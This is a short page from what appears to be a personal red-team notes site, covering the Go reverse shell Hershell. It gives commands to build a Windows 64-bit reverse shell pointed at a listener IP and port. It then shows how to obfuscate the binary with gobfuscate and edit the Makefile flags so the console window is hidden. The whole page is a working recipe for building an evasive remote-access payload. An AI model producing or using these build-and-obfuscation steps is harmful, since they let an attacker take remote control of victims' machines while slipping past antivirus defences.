#TodayILearned
  • Intro
  • Mobile
    • ADB
    • Bundletool
    • Frida
    • Objection
    • Apktool
    • Patching Smali
    • jadx
    • Xamarin
    • Emulator
    • Correlium
  • Network
    • Bettercap
  • Red Team
    • Unicorn
    • Macros
    • Defense Evasion
      • Load shellcode from memory using Golang
      • Hershell
    • Initial Compromise
      • Password Spraying
  • Web
    • Burp
    • IIS
  • Pentest
    • Metasploit
    • sqlmap
    • Hashcat
  • Miscellaneous
  • Recon
  • Docker
    • GitHub
    • Pulling from an insecure registry
    • Exploring a Docker image
  • Recon
    • Aquatone
    • Censys
    • MassDNS
    • S3 buckets enumeration with ffuf
    • Shodan
  • Flutter
    • Privilege Escalation
  • SSTI
Powered by GitBook
On this page
  • Installing Hershell
  • Obfuscating Hershell

Was this helpful?

  1. Red Team
  2. Defense Evasion

Hershell

PreviousLoad shellcode from memory using GolangNextInitial Compromise

Last updated 5 years ago

Was this helpful?

is a simple TCP reverse shell written in Go.

Installing Hershell

go get github.com/lesnuages/hershell
cd $GOPATH/src/github.com/lesnuages/hershell/
make depends
make windows64 LHOST=192.168.0.12 LPORT=1234

Obfuscating Hershell

obfuscate Go binaries and packages.

go get github.com/unixpickle/gobfuscate
gobfuscate -outdir github.com/lesnuages/hershell ./out

You will have to set the GOOS and GOARCH before running gobfuscate since it's using the default build profile otherwise it will takes only the Linux source files.

The Makefile also needs to be copied and edited:

LINUX_LDFLAGS=--ldflags "-X main.kephknbjcmclaiojcnoa=${LHOST}:${LPORT} -X main.eghlidmkekfibfjihlkg=$$(openssl x509 -fingerprint -sha256 -noout -in ${SRV_PEM} | cut -d '=' -f2)"
WIN_LDFLAGS=--ldflags "-X main.kephknbjcmclaiojcnoa=${LHOST}:${LPORT} -X main.eghlidmkekfibfjihlkg=$$(openssl x509 -fingerprint -sha256 -noout -in ${SRV_PEM} | cut -d '=' -f2) -H=windowsgui"
Hershell
gobfuscate